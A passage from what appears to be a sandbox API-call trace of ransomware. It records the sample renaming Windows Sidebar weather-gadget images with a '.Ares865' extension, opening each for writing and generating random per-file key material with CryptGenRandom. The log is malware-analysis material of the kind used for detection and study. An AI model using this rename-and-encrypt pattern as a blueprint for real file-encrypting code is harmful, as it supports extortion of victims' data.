"c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter.png.ares865"), dwFlags=0x1) returned 1 [0116.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8621) returned 1 [0116.412] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.413] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.413] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.419] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.420] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.420] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.Ares865") returned 125 [0116.421] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.423] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11142) returned 1 [0116.423] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.424] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.424] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.430] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.430] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png.Ares865") returned 102 [0116.431] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new.png.ares865"), dwFlags=0x1) returned 1 [0116.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.432] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9498) returned 1 [0116.432] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.433] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.433] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.443] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.443] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.443] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.444] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png.Ares865") returned 116 [0116.444] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.446] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11631) returned 1 [0116.447] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.447] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.447] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.451] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.451] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.451] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.452] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png.Ares865") returned 114 [0116.452] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent.png.ares865"), dwFlags=0x1) returned 1 [0116.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.454] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9012) returned 1 [0116.454] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.454] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.455] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.457] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.458] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.458] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.459] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.Ares865") returned 128 [0116.459] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.461] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11379) returned 1 [0116.461] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.462] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.462] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.464] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.465] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.465] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.465] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png.Ares865") returned 113 [0116.465] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous.png.ares865"), dwFlags=0x1) returned 1 [0116.467] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.467] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8636) returned 1 [0116.467] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.468] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.468] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.473] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.473] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.474] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.Ares865") returned 127 [0116.474] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.476] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11061) returned 1 [0116.476] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.477] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.477] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.479] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.480] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.480] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.481] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png.Ares865") returned 114 [0116.481] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent.png.ares865"), dwFlags=0x1) returned 1 [0116.482] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8870) returned 1 [0116.482] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.483] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.483] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.486] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.486] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.486] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.487] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.Ares865") returned 128 [0116.487] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.489] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11038) returned 1 [0116.489] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.490] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.490] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.492] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.493] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.493] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.494] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png.Ares865") returned 113 [0116.494] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous.png.ares865"), dwFlags=0x1) returned 1 [0116.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8707) returned 1 [0116.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.496] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.496] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.499] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.499] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.499] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.500] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.Ares865") returned 127 [0116.500] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.502] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.502] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11101) returned 1 [0116.502] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.503] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.503] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.505] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.506] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.506] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.506] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.Ares865") returned 99 [0116.507] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_rainy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_rainy.png.ares865"), dwFlags=0x1) returned 1 [0116.508] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_rainy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.508] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12659) returned 1 [0116.508] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.509] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.509] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.518] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 